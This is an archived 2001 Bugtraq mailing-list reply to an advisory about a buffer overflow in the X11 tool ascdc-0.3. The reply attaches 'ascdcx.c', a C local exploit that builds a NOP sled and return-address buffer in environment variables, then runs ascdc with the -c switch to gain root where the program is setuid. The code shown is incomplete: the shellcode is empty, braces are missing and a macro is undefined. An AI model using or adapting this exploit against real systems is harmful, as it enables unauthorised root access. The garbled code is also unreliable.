6200920 2001-03-09 21:42 +0100  /24 rader/ The Itch <itchie@BSE.DIE.MS>
Sänt av: joel@lysator.liu.se
Importerad: 2001-03-11  20:05  av Brevbäraren (som är implementerad i) Python
Externa svar till: itchie@BSE.DIE.MS
Mottagare: Bugtraq (import) <15852>
Kommentar till text 6191430 av  <advisories@WKIT.COM>
Ärende: Re: ascdc Buffer Overflow Vulnerability
On Thu, 8 Mar 2001 advisories@WKIT.COM wrote:

> TITLE:          ascdc Buffer Overflow Vulnerability
> ADVISORY ID:    WSIR-01/02-06
> DISCOVERED BY:  Christer Öberg, Wkit Security AB
> CONTACT:        advisories@wkit.com, Wkit Security AB
> CLASS:          Buffer Overflow
> OBJECT:         ascdc (exec)
> VENDOR:         Rob Malda (http://www.CmdrTaco.net)
> REMOTE:         No
> LOCAL:          Yes
> VULNERABLE:     ascdc-0.3

Attaced is a working version of the exploit for ascdc-0.3 using the -c
switch this time.


- The Itch
(6200920) ------------------------------------------
Bilaga (text/plain) i text 6200921
6200921 2001-03-09 21:42 +0100  /103 rader/ The Itch <itchie@BSE.DIE.MS>
Bilagans filnamn: "ascdcx.c"
Importerad: 2001-03-11  20:05  av Brevbäraren (som är implementerad i) Python
Externa svar till: itchie@BSE.DIE.MS
Mottagare: Bugtraq (import) <15853>
Bilaga (text/plain) till text 6200920
Ärende: Bilaga (ascdcx.c) till: Re: ascdc Buffer Overflow Vulnerability
/* /usr/X11R6/bin/ascdc local exploit.
 * (version: ascdc-0.3-2-i386)
 * Vulnerability found by Christer Öberg, Wkit Security AB 
 * <cut and pasted from the advisory posted on bugtraq> 
 * There are multiple buffer overflows in ascdc that can be exploited to 
 * gain root if it is installed setuid root. It is NOT installed setuid root 
 * by default but as the README says:
 * "If you intend to use the automounting feature, you must either run 
 * ascdc as root or setuid it."
 * Greetz fly out to: Tasc, C-murdah, Calimonk, Pyra, Tozz, Wildcoyote,
 *                    Lucipher, Script0r, Zephyr, ThePike, Kn00p, Cerial
 *		      Goolie and X-wartech.
 * - The Itch / BsE
 * - http://bse.die.ms
 * - irc.axenet.org 
#include <stdio.h>
#include <stdlib.h>
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

/* adjust if needed, this should be suffient */
unsigned long get_sp(void)
        __asm__("movl %esp, %eax");

char shellcode[] =

int main(int argc, char *argv[])
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
	if(argc > 1) { bsize = atoi(argv[1]); }

	if(!(buff = malloc(bsize)))
		printf("unable to allocate memory for %d bytes\n", bsize);

	if(!(egg = malloc(eggsize)))
	 	printf("unable to allocate memory for %d bytes\n", eggsize);

        addr = get_sp();
	printf("/usr/X11R6/bin/ascdc local exploit.\n");
	printf("Coded by The Itch / BsE\n\n");
        printf("Using return address: 0x%x\n", addr);
        printf("Using buffersize    : %d\n", bsize);
        ptr = buff;
        addr_ptr = (long *) ptr;  
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = addr; }
        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode) -1; i++) 
		*(ptr++) = NOP; 

	for(i = 0; i < strlen(shellcode); i++) 
		*(ptr++) = shellcode[i];

        buff[bsize - 1] = '\0';
        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
        memcpy(buff, "RET=", 4);
        system("/usr/X11R6/bin/ascdc -c $RET");
        return 0;

/* remember, there's no cure for BsE */
(6200921) ------------------------------------------